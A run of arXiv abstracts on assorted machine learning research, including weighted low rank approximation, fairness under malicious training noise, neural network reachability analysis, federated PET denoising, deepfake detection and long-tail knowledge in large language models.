Weighted low rank approximation is a fundamental problem in numerical linear algebra, and it has many applications in machine learning. Given a matrix $M \in \mathbb{R}^{n \times n}$, a weight matrix $W \in \mathbb{R}_{\geq 0}^{n \times n}$, and a parameter $k$, the goal is to output two matrices $U, V \in \mathbb{R}^{n \times k}$ such that $\| W \circ (M - U V^\top) \|_F$ is minimized, where $\circ$ denotes the Hadamard product. Such a problem is known to be NP-hard and even hard to approximate assuming the Exponential Time Hypothesis [GG11, RSW16]. Meanwhile, alternating minimization is a good heuristic for approximating weighted low rank approximation. The work [LLR16] shows that, under mild assumptions, alternating minimization does provide provable guarantees. In this work, we develop an efficient and robust framework for alternating minimization. For weighted low rank approximation, this improves the runtime of [LLR16] from $n^2 k^2$ to $n^2 k$. At the heart of our framework is a high-accuracy multiple response regression solver together with a robust analysis of alternating minimization.
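The alternating-minimization heuristic the paper analyzes can be sketched as weighted alternating least squares (a plain NumPy version without the paper's high-accuracy regression solver; the tiny ridge term is only an implementation convenience):

```python
import numpy as np

def weighted_als(M, W, k, n_iter=30, seed=0):
    """Alternating minimization for min_{U,V} ||W o (M - U V^T)||_F.
    With V fixed, each row of U solves a small weighted least-squares
    problem, and symmetrically for the rows of V."""
    rng = np.random.default_rng(seed)
    n, m = M.shape
    U = rng.normal(size=(n, k))
    V = rng.normal(size=(m, k))
    ridge = 1e-8 * np.eye(k)          # tiny regularizer for numerical stability
    for _ in range(n_iter):
        for i in range(n):            # update rows of U with V fixed
            G = V * W[i][:, None]     # = diag(W[i]) @ V
            U[i] = np.linalg.solve(V.T @ G + ridge, G.T @ M[i])
        for j in range(m):            # update rows of V with U fixed
            G = U * W[:, j][:, None]  # = diag(W[:, j]) @ U
            V[j] = np.linalg.solve(U.T @ G + ridge, G.T @ M[:, j])
    return U, V

# sanity check: a rank-2 target with uniform weights is recovered almost exactly
rng = np.random.default_rng(2)
M = rng.normal(size=(20, 2)) @ rng.normal(size=(2, 15))
U, V = weighted_als(M, np.ones_like(M), k=2)
```

Each inner solve costs $O(k^2)$ per row here; the paper's contribution is a faster, provably robust solver for exactly these alternating regression steps.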
    Automating Model Comparison in Factor Graphs. (arXiv:2306.05965v2 [cs.LG] UPDATED)
    Bayesian state and parameter estimation have been automated effectively in a variety of probabilistic programming languages. The process of model comparison on the other hand, which still requires error-prone and time-consuming manual derivations, is often overlooked despite its importance. This paper efficiently automates Bayesian model averaging, selection, and combination by message passing on a Forney-style factor graph with a custom mixture node. Parameter and state inference, and model comparison can then be executed simultaneously using message passing with scale factors. This approach shortens the model design cycle and allows for the straightforward extension to hierarchical and temporal model priors to accommodate for modeling complicated time-varying processes.
    On Learning the Tail Quantiles of Driving Behavior Distributions via Quantile Regression and Flows. (arXiv:2305.13106v2 [cs.LG] UPDATED)
Towards safe autonomous driving (AD), we consider the problem of learning models that accurately capture the diversity and tail quantiles of human driver behavior probability distributions, in interaction with an AD vehicle. Such models, which predict drivers' continuous actions from their states, are particularly relevant for closing the gap between AD agent simulations and reality. To this end, we adapt two flexible quantile learning frameworks for this setting that avoid strong distributional assumptions: (1) quantile regression (based on the tilted absolute loss), and (2) autoregressive quantile flows (a version of normalizing flows). Training happens in a behavior-cloning fashion. We use the highD dataset, consisting of driver trajectories on several highways. We evaluate our approach in a one-step acceleration prediction task, and in multi-step driver simulation rollouts. We report quantitative results using the tilted absolute loss as a metric, give qualitative examples showing that realistic extremal behavior can be learned, and discuss the main insights.
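The tilted (pinball) absolute loss at the core of approach (1) can be sketched directly; minimizing it over a constant predictor recovers the empirical quantile (a toy NumPy check, not the paper's model):

```python
import numpy as np

def tilted_loss(y, q, tau):
    """Tilted (pinball) absolute loss for quantile level tau:
    over-predictions are weighted (1 - tau), under-predictions tau."""
    e = y - q
    return np.mean(np.maximum(tau * e, (tau - 1) * e))

# minimizing the loss over a constant recovers the empirical tau-quantile
y = np.random.default_rng(0).normal(size=2000)
grid = np.linspace(-3.0, 3.0, 601)
best = grid[np.argmin([tilted_loss(y, q, 0.9) for q in grid])]
```

Replacing the constant with a state-conditioned network gives conditional quantile regression, which is what makes the tail quantiles of driver behavior learnable.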
    On the Vulnerability of Fairness Constrained Learning to Malicious Noise. (arXiv:2307.11892v2 [cs.LG] UPDATED)
    We consider the vulnerability of fairness-constrained learning to small amounts of malicious noise in the training data. Konstantinov and Lampert (2021) initiated the study of this question and presented negative results showing there exist data distributions where for several fairness constraints, any proper learner will exhibit high vulnerability when group sizes are imbalanced. Here, we present a more optimistic view, showing that if we allow randomized classifiers, then the landscape is much more nuanced. For example, for Demographic Parity we show we can incur only a $\Theta(\alpha)$ loss in accuracy, where $\alpha$ is the malicious noise rate, matching the best possible even without fairness constraints. For Equal Opportunity, we show we can incur an $O(\sqrt{\alpha})$ loss, and give a matching $\Omega(\sqrt{\alpha})$ lower bound. In contrast, Konstantinov and Lampert (2021) showed for proper learners the loss in accuracy for both notions is $\Omega(1)$. The key technical novelty of our work is how randomization can bypass simple "tricks" an adversary can use to amplify its power. We also consider additional fairness notions including Equalized Odds and Calibration. For these fairness notions, the excess accuracy clusters into three natural regimes $O(\alpha)$, $O(\sqrt{\alpha})$, and $O(1)$. These results provide a more fine-grained view of the sensitivity of fairness-constrained learning to adversarial noise in training data.
    Efficient Interaction-Aware Interval Analysis of Neural Network Feedback Loops. (arXiv:2307.14938v1 [eess.SY])
    In this paper, we propose a computationally efficient framework for interval reachability of neural network controlled systems. Our approach builds upon inclusion functions for the neural network controller and the open-loop system. We observe that many state-of-the-art neural network verifiers can produce inclusion functions for neural networks. We introduce and analyze a new class of inclusion functions for the open-loop dynamics based on bounds of the function Jacobian that is particularly suitable for capturing the interactions between systems and neural network controllers. Next, for any dynamical system, we use inclusion functions to construct an embedding system with twice the number of states as the original system. We show that a single trajectory of this embedding system provides hyper-rectangular over-approximations of reachable sets. We then propose two approaches for constructing a closed-loop embedding system for a neural network controlled dynamical system that accounts for the interaction between the system and the controller in different ways. The interconnection-based approach accounts for the worst-case evolution of each coordinate separately by substituting the neural network inclusion function into the open-loop embedding system. The interaction-based approach uses the newly introduced class of Jacobian-based inclusion functions to fully capture first-order interactions between the system and the controller. Finally, we implement our approach in a Python framework called \texttt{ReachMM} and show that on several existing benchmarks, our methods outperform the existing approaches in the literature. We also demonstrate the scalability of our method on a vehicle platooning example with up to $200$ states.
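    An inclusion function maps an input interval to an interval guaranteed to contain the true image of the map. A minimal natural inclusion function for an affine map, purely as an illustrative sketch (the function names and the dynamics are hypothetical, not taken from ReachMM):

```python
def interval_affine(lo, hi, a, b):
    """Natural inclusion function for x -> a*x + b on the interval [lo, hi].

    Returns bounds guaranteed to contain {a*x + b : lo <= x <= hi};
    for a monotone affine map the endpoint images suffice.
    """
    y1, y2 = a * lo + b, a * hi + b
    return min(y1, y2), max(y1, y2)

# Over-approximate one explicit Euler step of x' = -2x (step 0.1)
# from the initial interval x in [1, 2]: discrete map x -> 0.8 x.
print(interval_affine(1.0, 2.0, 0.8, 0.0))  # (0.8, 1.6)
```

    Composing such inclusion functions for the controller and the open-loop dynamics, as the paper does, propagates hyper-rectangular over-approximations of the reachable set step by step.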
    Nonsmooth Nonconvex-Nonconcave Minimax Optimization: Primal-Dual Balancing and Iteration Complexity Analysis. (arXiv:2209.10825v3 [math.OC] UPDATED)
    Nonconvex-nonconcave minimax optimization has gained widespread interest over the last decade. However, most existing works focus on variants of gradient descent-ascent (GDA) algorithms, which are only applicable to smooth nonconvex-concave settings. To address this limitation, we propose a novel algorithm named smoothed proximal linear descent-ascent (smoothed PLDA), which can effectively handle a broad range of structured nonsmooth nonconvex-nonconcave minimax problems. Specifically, we consider the setting where the primal function has a nonsmooth composite structure and the dual function possesses the Kurdyka-Lojasiewicz (KL) property with exponent $\theta \in [0,1)$. We introduce a novel convergence analysis framework for smoothed PLDA, the key components of which are our newly developed nonsmooth primal error bound and dual error bound. Using this framework, we show that smoothed PLDA can find both $\epsilon$-game-stationary points and $\epsilon$-optimization-stationary points of the problems of interest in $\mathcal{O}(\epsilon^{-2\max\{2\theta,1\}})$ iterations. Furthermore, when $\theta \in [0,\frac{1}{2}]$, smoothed PLDA achieves the optimal iteration complexity of $\mathcal{O}(\epsilon^{-2})$. To further demonstrate the effectiveness and wide applicability of our analysis framework, we show that certain max-structured problem possesses the KL property with exponent $\theta=0$ under mild assumptions. As a by-product, we establish algorithm-independent quantitative relationships among various stationarity concepts, which may be of independent interest.
    Exploiting Richness of Learned Compressed Representation of Images for Semantic Segmentation. (arXiv:2307.01524v2 [cs.CV] UPDATED)
    Autonomous vehicles and Advanced Driving Assistance Systems (ADAS) have the potential to radically change the way we travel. Many such vehicles currently rely on segmentation and object detection algorithms to detect and track objects in their surroundings. The data collected from the vehicles is often sent to cloud servers to facilitate continual/life-long learning of these algorithms. Considering the bandwidth constraints, the data is compressed before sending it to servers, where it is typically decompressed for training and analysis. In this work, we propose the use of a learning-based compression codec to reduce the latency overhead incurred by the decompression operation in the standard pipeline. We demonstrate that the learned compressed representation can also be used to perform tasks like semantic segmentation in addition to decompression to obtain the images. We experimentally validate the proposed pipeline on the Cityscapes dataset, where we achieve a compression factor up to $66 \times$ while preserving the information required to perform segmentation with a dice coefficient of $0.84$ as compared to $0.88$ achieved using decompressed images, while reducing the overall compute by $11\%$.
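    The dice coefficient used above to score segmentation overlap is $2|A \cap B| / (|A| + |B|)$; a small sketch for binary masks (variable names are ours, not the paper's):

```python
def dice_coefficient(pred, target):
    """Dice coefficient 2|A∩B| / (|A| + |B|) for binary masks as flat 0/1 lists."""
    intersection = sum(p * t for p, t in zip(pred, target))
    total = sum(pred) + sum(target)
    # Both masks empty: define perfect agreement.
    return 2.0 * intersection / total if total else 1.0

pred   = [1, 1, 0, 0, 1]
target = [1, 0, 0, 1, 1]
print(dice_coefficient(pred, target))  # 2*2 / (3+3) ≈ 0.667
```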
    Learning Transfer Operators by Kernel Density Estimation. (arXiv:2210.03124v3 [cs.LG] UPDATED)
    Inference of transfer operators from data is often formulated as a classical problem that hinges on the Ulam method. The conventional description, known as the Ulam-Galerkin method, involves projecting onto basis functions represented as characteristic functions supported over a fine grid of rectangles. From this perspective, the Ulam-Galerkin approach can be interpreted as density estimation using the histogram method. In this study, we recast the problem within the framework of statistical density estimation. This alternative perspective allows for an explicit and rigorous analysis of bias and variance, thereby facilitating a discussion on the mean square error. Through comprehensive examples utilizing the logistic map and a Markov map, we demonstrate the validity and effectiveness of this approach in estimating the eigenvectors of the Frobenius-Perron operator. We compare the performance of Histogram Density Estimation (HDE) and Kernel Density Estimation (KDE) methods and find that KDE generally outperforms HDE in terms of accuracy. However, it is important to note that KDE exhibits limitations around boundary points and jumps. Based on our research findings, we suggest the possibility of incorporating other density estimation methods into this field and propose future investigations into the application of KDE-based estimation for high-dimensional maps. These findings provide valuable insights for researchers and practitioners working on estimating the Frobenius-Perron operator and highlight the potential of density estimation techniques in this area of study. Keywords: Transfer Operators; Frobenius-Perron operator; probability density estimation; Ulam-Galerkin method; Kernel Density Estimation; Histogram Density Estimation.
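    A minimal Gaussian kernel density estimator of the kind compared against histograms above, as an illustrative sketch (not the paper's implementation):

```python
import math

def kde(samples, x, bandwidth):
    """Gaussian kernel density estimate at point x.

    Averages a Gaussian bump of width `bandwidth` centered on each sample;
    unlike a histogram, the estimate is smooth in both x and the data.
    """
    n = len(samples)
    return sum(
        math.exp(-0.5 * ((x - s) / bandwidth) ** 2)
        / (bandwidth * math.sqrt(2.0 * math.pi))
        for s in samples
    ) / n

# Density estimate at the origin from samples clustered around it.
samples = [-0.2, -0.1, 0.0, 0.1, 0.2]
print(kde(samples, 0.0, bandwidth=0.5))
```

    The bandwidth plays the role of the histogram bin width and governs the bias-variance trade-off the paper analyzes.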
    Scalable Bayesian Uncertainty Quantification for Neural Network Potentials: Promise and Pitfalls. (arXiv:2212.07959v2 [physics.chem-ph] UPDATED)
    Neural network (NN) potentials promise highly accurate molecular dynamics (MD) simulations within the computational complexity of classical MD force fields. However, when applied outside their training domain, NN potential predictions can be inaccurate, increasing the need for Uncertainty Quantification (UQ). Bayesian modeling provides the mathematical framework for UQ, but classical Bayesian methods based on Markov chain Monte Carlo (MCMC) are computationally intractable for NN potentials. By training graph NN potentials for coarse-grained systems of liquid water and alanine dipeptide, we demonstrate here that scalable Bayesian UQ via stochastic gradient MCMC (SG-MCMC) yields reliable uncertainty estimates for MD observables. We show that cold posteriors can reduce the required training data size and that for reliable UQ, multiple Markov chains are needed. Additionally, we find that SG-MCMC and the Deep Ensemble method achieve comparable results, despite shorter training and less hyperparameter tuning of the latter. We show that both methods can capture aleatoric and epistemic uncertainty reliably, but not systematic uncertainty, which needs to be minimized by adequate modeling to obtain accurate credible intervals for MD observables. Our results represent a step towards accurate UQ that is of vital importance for trustworthy NN potential-based MD simulations required for decision-making in practice.
    VeML: An End-to-End Machine Learning Lifecycle for Large-scale and High-dimensional Data. (arXiv:2304.13037v2 [cs.LG] UPDATED)
    An end-to-end machine learning (ML) lifecycle consists of many iterative processes, from data preparation and ML model design to model training and then deploying the trained model for inference. When building an end-to-end lifecycle for an ML problem, many ML pipelines must be designed and executed that produce a huge number of lifecycle versions. Therefore, this paper introduces VeML, a Version management system dedicated to end-to-end ML Lifecycle. Our system tackles several crucial problems that other systems have not solved. First, we address the high cost of building an ML lifecycle, especially for large-scale and high-dimensional dataset. We solve this problem by proposing to transfer the lifecycle of similar datasets managed in our system to the new training data. We design an algorithm based on the core set to compute similarity for large-scale, high-dimensional data efficiently. Another critical issue is the model accuracy degradation by the difference between training data and testing data during the ML lifetime, which leads to lifecycle rebuild. Our system helps to detect this mismatch without getting labeled data from testing data and rebuild the ML lifecycle for a new data version. To demonstrate our contributions, we conduct experiments on real-world, large-scale datasets of driving images and spatiotemporal sensor data and show promising results.
    Differential Convolutional Fuzzy Time Series Forecasting. (arXiv:2305.08890v2 [cs.LG] UPDATED)
    Fuzzy time series forecasting (FTSF) is a typical forecasting method with wide application. Traditional FTSF is regarded as an expert system, which causes it to lose the ability to recognize undefined features; this is the main reason for poor forecasts with FTSF. To solve this problem, the proposed Differential Fuzzy Convolutional Neural Network (DFCNN) utilizes a convolutional neural network to re-implement FTSF with learnable ability. DFCNN is capable of recognizing potential information and improving forecasting accuracy. Thanks to the learnable ability of the neural network, the length of the fuzzy rules established in FTSF is extended to an arbitrary length that an expert system cannot handle. At the same time, FTSF usually cannot achieve satisfactory performance on non-stationary time series: the trend causes the fuzzy sets established by FTSF to become invalid and the forecast to fail. DFCNN utilizes a differencing algorithm to weaken the non-stationarity of the time series, so that DFCNN can forecast non-stationary time series with a low error that FTSF cannot achieve. Extensive experiments show that DFCNN has an excellent prediction effect, ahead of existing FTSF and common time series forecasting algorithms. Finally, DFCNN provides further ideas for improving FTSF and holds continued research value.
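    The differencing step used to weaken non-stationarity is, in its simplest form, first-order differencing; a sketch (names are ours, and the paper's algorithm may differ in detail):

```python
def difference(series):
    """First-order differencing: y[t] = x[t+1] - x[t].

    Removes a deterministic trend's constant slope, leaving a
    series that is closer to stationary.
    """
    return [b - a for a, b in zip(series, series[1:])]

def undifference(first, diffs):
    """Invert differencing by cumulative summation from the first value."""
    out = [first]
    for d in diffs:
        out.append(out[-1] + d)
    return out

trend = [1, 3, 6, 10, 15]                 # non-stationary: increments grow
print(difference(trend))                   # [2, 3, 4, 5]
print(undifference(1, difference(trend)))  # round-trips to [1, 3, 6, 10, 15]
```

    A model forecasts the differenced series and the prediction is undifferenced back to the original scale.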
    Harnessing Synthetic Active Particles for Physical Reservoir Computing. (arXiv:2307.15010v1 [cond-mat.soft])
    The processing of information is an indispensable property of living systems, realized by networks of active processes with enormous complexity. They have inspired many variants of modern machine learning, one of them being reservoir computing, in which stimulating a network of nodes with fading memory enables computations and complex predictions. Reservoirs are implemented on computer hardware, but also on unconventional physical substrates such as mechanical oscillators, spins, or bacteria, often summarized as physical reservoir computing. Here we demonstrate physical reservoir computing with a synthetic active microparticle system that self-organizes from an active and a passive component into inherently noisy nonlinear dynamical units. The self-organization and dynamical response of the unit are the result of a delayed propulsion of the microswimmer towards a passive target. A reservoir of such units with self-coupling via the delayed response can perform predictive tasks despite the strong noise resulting from the Brownian motion of the microswimmers. To achieve efficient noise suppression, we introduce a special architecture that uses historical reservoir states for output. Our results pave the way for the study of information processing in synthetic self-organized active particle systems.
    FedFTN: Personalized Federated Learning with Deep Feature Transformation Network for Multi-institutional Low-count PET Denoising. (arXiv:2304.00570v2 [eess.IV] UPDATED)
    Low-count PET is an efficient way to reduce radiation exposure and acquisition time, but the reconstructed images often suffer from low signal-to-noise ratio (SNR), thus affecting diagnosis and other downstream tasks. Recent advances in deep learning have shown great potential in improving low-count PET image quality, but acquiring a large, centralized, and diverse dataset from multiple institutions for training a robust model is difficult due to privacy and security concerns of patient data. Moreover, low-count PET data at different institutions may have different data distribution, thus requiring personalized models. While previous federated learning (FL) algorithms enable multi-institution collaborative training without the need of aggregating local data, addressing the large domain shift in the application of multi-institutional low-count PET denoising remains a challenge and is still highly under-explored. In this work, we propose FedFTN, a personalized federated learning strategy that addresses these challenges. FedFTN uses a local deep feature transformation network (FTN) to modulate the feature outputs of a globally shared denoising network, enabling personalized low-count PET denoising for each institution. During the federated learning process, only the denoising network's weights are communicated and aggregated, while the FTN remains at the local institutions for feature transformation. We evaluated our method using a large-scale dataset of multi-institutional low-count PET imaging data from three medical centers located across three continents, and showed that FedFTN provides high-quality low-count PET images, outperforming previous baseline FL reconstruction methods across all low-count levels at all three institutions.
    Learning a Generic Value-Selection Heuristic Inside a Constraint Programming Solver. (arXiv:2301.01913v2 [cs.AI] UPDATED)
    Constraint programming is known for being an efficient approach for solving combinatorial problems. Important design choices in a solver are the branching heuristics, which are designed to lead the search to the best solutions in a minimum amount of time. However, developing these heuristics is a time-consuming process that requires problem-specific expertise. This observation has motivated many efforts to use machine learning to automatically learn efficient heuristics without expert intervention. To the best of our knowledge, this remains an open research question. Although several generic variable-selection heuristics are available in the literature, the options for a generic value-selection heuristic are more scarce. In this paper, we propose to tackle this issue by introducing a generic learning procedure that can be used to obtain a value-selection heuristic inside a constraint programming solver. This has been achieved thanks to the combination of a deep Q-learning algorithm, a tailored reward signal, and a heterogeneous graph neural network architecture. Experiments on graph coloring, maximum independent set, and maximum cut problems show that our framework is able to find better solutions, close to optimality, without requiring a large number of backtracks, while remaining generic.
    Causal Lifting and Link Prediction. (arXiv:2302.01198v2 [cs.LG] UPDATED)
    Existing causal models for link prediction assume an underlying set of inherent node factors -- an innate characteristic defined at the node's birth -- that governs the causal evolution of links in the graph. In some causal tasks, however, link formation is path-dependent: The outcome of link interventions depends on existing links. Unfortunately, these existing causal methods are not designed for path-dependent link formation, as the cascading functional dependencies between links (arising from path dependence) are either unidentifiable or require an impractical number of control variables. To overcome this, we develop the first causal model capable of dealing with path dependencies in link prediction. In this work we introduce the concept of causal lifting, an invariance in causal models of independent interest that, on graphs, allows the identification of causal link prediction queries using limited interventional data. Further, we show how structural pairwise embeddings exhibit lower bias and correctly represent the task's causal structure, as opposed to existing node embeddings, e.g., graph neural network node embeddings and matrix factorization. Finally, we validate our theoretical findings on three scenarios for causal link prediction tasks: knowledge base completion, covariance matrix estimation and consumer-product recommendations.
    Algorithmic Hallucinations of Near-Surface Winds: Statistical Downscaling with Generative Adversarial Networks to Convection-Permitting Scales. (arXiv:2302.08720v2 [physics.ao-ph] UPDATED)
    This paper explores the application of emerging machine learning methods from image super-resolution (SR) to the task of statistical downscaling. We specifically focus on convolutional neural network-based Generative Adversarial Networks (GANs). Our GANs are conditioned on low-resolution (LR) inputs to generate high-resolution (HR) surface winds emulating Weather Research and Forecasting (WRF) model simulations over North America. Unlike traditional SR models, where LR inputs are idealized coarsened versions of the HR images, WRF emulation involves using non-idealized LR and HR pairs resulting in shared-scale mismatches due to internal variability. Our study builds upon current SR-based statistical downscaling by experimenting with a novel frequency-separation (FS) approach from the computer vision field. To assess the skill of SR models, we carefully select evaluation metrics, and focus on performance measures based on spatial power spectra. Our analyses reveal how GAN configurations influence spatial structures in the generated fields, particularly biases in spatial variability spectra. Using power spectra to evaluate the FS experiments reveals that successful applications of FS in computer vision do not translate to climate fields. However, the FS experiments demonstrate the sensitivity of power spectra to a commonly used GAN-based SR objective function, which helps interpret and understand its role in determining spatial structures. This result motivates the development of a novel partial frequency-separation scheme as a promising configuration option. We also quantify the influence on GAN performance of non-idealized LR fields resulting from internal variability. Furthermore, we conduct a spectra-based feature-importance experiment allowing us to explore the dependence of the spatial structure of generated fields on different physically relevant LR covariates.
    Trace Recovery from Stochastically Known Logs. (arXiv:2206.12672v2 [cs.LG] UPDATED)
    In this work we propose an algorithm for trace recovery from stochastically known logs, a setting that is becoming more common with the increasing number of sensors and predictive models that generate uncertain data. The suggested approach calculates the conformance between a process model and a stochastically known trace and recovers the best alignment within this stochastic trace as the true trace. The paper offers an analysis of the impact of various cost models on trace recovery accuracy and makes use of a product multi-graph to compare alternative trace recovery options. The average accuracy of our approach, evaluated using two publicly available datasets, is impressive, with an average recovery accuracy score of 90-97%, significantly improving a common heuristic that chooses the most likely value for each uncertain activity. We believe that the effectiveness of the proposed algorithm in recovering correct traces from stochastically known logs may be a powerful aid for developing credible decision-making tools in uncertain settings.
    Exploring Weight Balancing on Long-Tailed Recognition Problem. (arXiv:2305.16573v4 [cs.LG] UPDATED)
    Recognition problems in long-tailed data, where the sample size per class is heavily skewed, have recently gained importance because the distribution of the sample size per class in a dataset is generally exponential unless the sample size is intentionally adjusted. Various approaches have been devised to address these problems. Recently, weight balancing, which combines well-known classical regularization techniques with two-stage training, has been proposed. Despite its simplicity, it achieves high performance compared with existing methods devised in various ways. However, there is a lack of understanding as to why this approach is effective for long-tailed data. In this study, we analyze the method focusing on neural collapse and the cone effect at each training stage and find that it can be decomposed into an increase in the Fisher's discriminant ratio of the feature extractor caused by weight decay and the cross-entropy loss, and implicit logit adjustment caused by weight decay and the class-balanced loss. Our analysis shows that the training method can be further simplified by reducing the number of training stages to one while increasing accuracy.
    Self-Supervised Graph Transformer for Deepfake Detection. (arXiv:2307.15019v1 [cs.CV])
    Deepfake detection methods have shown promising results in recognizing forgeries within a given dataset, where training and testing take place on the in-distribution dataset. However, their performance deteriorates significantly when presented with unseen samples. As a result, a reliable deepfake detection system must remain impartial to forgery types, appearance, and quality for guaranteed generalizable detection performance. Despite various attempts to enhance cross-dataset generalization, the problem remains challenging, particularly when testing against common post-processing perturbations, such as video compression or blur. Hence, this study introduces a deepfake detection framework, leveraging a self-supervised pre-training model that delivers exceptional generalization ability, withstanding common corruptions and enabling feature explainability. The framework comprises three key components: a feature extractor based on vision Transformer architecture that is pre-trained via self-supervised contrastive learning methodology, a graph convolution network coupled with a Transformer discriminator, and a graph Transformer relevancy map that provides a better understanding of manipulated regions and further explains the model's decision. To assess the effectiveness of the proposed framework, several challenging experiments are conducted, including in-data distribution performance, cross-dataset, cross-manipulation generalization, and robustness against common post-production perturbations. The results achieved demonstrate the remarkable effectiveness of the proposed deepfake detection framework, surpassing the current state-of-the-art approaches.
    Speeding up Fourier Neural Operators via Mixed Precision. (arXiv:2307.15034v1 [cs.LG])
    The Fourier neural operator (FNO) is a powerful technique for learning surrogate maps for partial differential equation (PDE) solution operators. For many real-world applications, which often require high-resolution data points, training time and memory usage are significant bottlenecks. While there are mixed-precision training techniques for standard neural networks, those work for real-valued datatypes on finite dimensions and therefore cannot be directly applied to FNO, which crucially operates in the (complex-valued) Fourier domain and in function spaces. On the other hand, since the Fourier transform is already an approximation (due to discretization error), we do not need to perform the operation at full precision. In this work, we (i) profile memory and runtime for FNO with full and mixed-precision training, (ii) conduct a study on the numerical stability of mixed-precision training of FNO, and (iii) devise a training routine which substantially decreases training time and memory usage (up to 34%), with little or no reduction in accuracy, on the Navier-Stokes and Darcy flow equations. Combined with the recently proposed tensorized FNO (Kossaifi et al., 2023), the resulting model has far better performance while also being significantly faster than the original FNO.
    Large Language Models Struggle to Learn Long-Tail Knowledge. (arXiv:2211.08411v2 [cs.CL] UPDATED)
    The Internet contains a wealth of knowledge -- from the birthdays of historical figures to tutorials on how to code -- all of which may be learned by language models. However, while certain pieces of information are ubiquitous on the web, others appear extremely rarely. In this paper, we study the relationship between the knowledge memorized by large language models and the information in pre-training datasets scraped from the web. In particular, we show that a language model's ability to answer a fact-based question relates to how many documents associated with that question were seen during pre-training. We identify these relevant documents by entity linking pre-training datasets and counting documents that contain the same entities as a given question-answer pair. Our results demonstrate strong correlational and causal relationships between accuracy and relevant document count for numerous question answering datasets (e.g., TriviaQA), pre-training corpora (e.g., ROOTS), and model sizes (e.g., 176B parameters). Moreover, while larger models are better at learning long-tail knowledge, we estimate that today's models must be scaled by many orders of magnitude to reach competitive QA performance on questions with little support in the pre-training data. Finally, we show that retrieval-augmentation can reduce the dependence on relevant pre-training information, presenting a promising approach for capturing the long-tail.
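    The relevant-document count described above can be sketched as: a document counts if its linked entities cover all entities of the question-answer pair (entity linking itself is assumed already done; all names and data here are illustrative):

```python
def relevant_doc_count(qa_entities, corpus_entities):
    """Count documents whose linked entities cover all entities of a QA pair.

    qa_entities: set of entities appearing in a question-answer pair.
    corpus_entities: list of per-document entity sets from the corpus.
    """
    qa = set(qa_entities)
    return sum(1 for doc in corpus_entities if qa <= doc)

# Toy pre-training corpus represented by its per-document entity sets.
corpus = [
    {"Mozart", "Salzburg", "1756"},
    {"Mozart", "Vienna"},
    {"Beethoven", "Bonn"},
]
print(relevant_doc_count({"Mozart", "1756"}, corpus))  # 1: only one doc has both
```

    Correlating this count with QA accuracy is what reveals the long-tail effect the paper reports.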
    Analyzing Explainer Robustness via Lipschitzness of Prediction Functions. (arXiv:2206.12481v2 [cs.LG] UPDATED)
    Machine learning methods have significantly improved in their predictive capabilities, but at the same time they are becoming more complex and less transparent. As a result, explainers are often relied on to provide interpretability to these black-box prediction models. Since explainers serve as crucial diagnostic tools, it is important that they themselves are robust. In this paper we focus on one particular aspect of robustness, namely that an explainer should give similar explanations for similar data inputs. We formalize this notion by introducing and defining explainer astuteness, analogous to astuteness of prediction functions. Our formalism allows us to connect explainer robustness to the predictor's probabilistic Lipschitzness, which captures the probability of local smoothness of a function. We provide lower bound guarantees on the astuteness of a variety of explainers (e.g., SHAP, RISE, CXPlain) given the Lipschitzness of the prediction function. These theoretical results imply that locally smooth prediction functions lend themselves to locally robust explanations. We evaluate these results empirically on simulated as well as real datasets.
    Predicting Winning Regions in Parity Games via Graph Neural Networks (Extended Abstract). (arXiv:2210.09924v2 [cs.GT] UPDATED)
    Solving parity games is a major building block for numerous applications in reactive program verification and synthesis. While they can be solved efficiently in practice, no known approach has a polynomial worst-case runtime complexity. We present an incomplete polynomial-time approach to determining the winning regions of parity games via graph neural networks. Our evaluation on 900 randomly generated parity games shows that this approach is effective and efficient in practice. It correctly determines the winning regions of $\sim$60\% of the games in our data set and only incurs minor errors in the remaining ones. We believe that this approach can be extended to efficiently solve parity games as well.
    Securing Secure Aggregation: Mitigating Multi-Round Privacy Leakage in Federated Learning. (arXiv:2106.03328v2 [cs.LG] UPDATED)
    Secure aggregation is a critical component in federated learning (FL), which enables the server to learn the aggregate model of the users without observing their local models. Conventionally, secure aggregation algorithms focus only on ensuring the privacy of individual users in a single training round. We contend that such designs can lead to significant privacy leakages over multiple training rounds, due to partial user selection/participation at each round of FL. In fact, we show that the conventional random user selection strategies in FL lead to leaking users' individual models within a number of rounds that is linear in the number of users. To address this challenge, we introduce a secure aggregation framework, Multi-RoundSecAgg, with multi-round privacy guarantees. In particular, we introduce a new metric to quantify the privacy guarantees of FL over multiple training rounds, and develop a structured user selection strategy that guarantees the long-term privacy of each user (over any number of training rounds). Our framework also carefully accounts for the fairness and the average number of participating users at each round. Our experiments on the MNIST and CIFAR-10 datasets in the IID and the non-IID settings demonstrate the performance improvement over the baselines, both in terms of privacy protection and test accuracy.
    Decoupling Knowledge from Memorization: Retrieval-augmented Prompt Learning. (arXiv:2205.14704v4 [cs.CL] UPDATED)
    Prompt learning approaches have made waves in natural language processing by inducing better few-shot performance, but they still follow a parametric learning paradigm, in which forgetting and rote memorization can lead to unstable generalization. Specifically, vanilla prompt learning may struggle to utilize atypical instances by rote during fully-supervised training or overfit shallow patterns with low-shot data. To alleviate such limitations, we develop RetroPrompt with the motivation of decoupling knowledge from memorization to help the model strike a balance between generalization and memorization. In contrast with vanilla prompt learning, RetroPrompt constructs an open-book knowledge-store from training instances and implements a retrieval mechanism during the process of input, training and inference, thus equipping the model with the ability to retrieve related contexts from the training corpus as cues for enhancement. Extensive experiments demonstrate that RetroPrompt can obtain better performance in both few-shot and zero-shot settings. Besides, we further illustrate that our proposed RetroPrompt can yield better generalization abilities with new datasets. Detailed analysis of memorization indeed reveals that RetroPrompt can reduce the reliance of language models on memorization, thus improving generalization for downstream tasks. Code is available at https://github.com/zjunlp/PromptKG/tree/main/research/RetroPrompt.
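A minimal sketch of the retrieval step described above, assuming a cosine-similarity nearest-neighbour search over a store of training-instance embeddings; the embeddings, texts, and `retrieve` helper are hypothetical stand-ins, not RetroPrompt's actual implementation.

```python
import numpy as np

def retrieve(query_emb, store_embs, store_texts, k=2):
    """Return the k training instances nearest to the query by cosine
    similarity, to be used as cues for the model (illustrative only)."""
    q = query_emb / np.linalg.norm(query_emb)
    s = store_embs / np.linalg.norm(store_embs, axis=1, keepdims=True)
    idx = np.argsort(s @ q)[::-1][:k]        # indices of most similar items
    return [store_texts[i] for i in idx]

# Tiny hypothetical knowledge-store of training-instance embeddings.
store = np.array([[1.0, 0.0], [0.0, 1.0], [0.9, 0.1]])
texts = ["ex0", "ex1", "ex2"]
cues = retrieve(np.array([1.0, 0.05]), store, texts, k=2)
assert cues == ["ex0", "ex2"]
```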
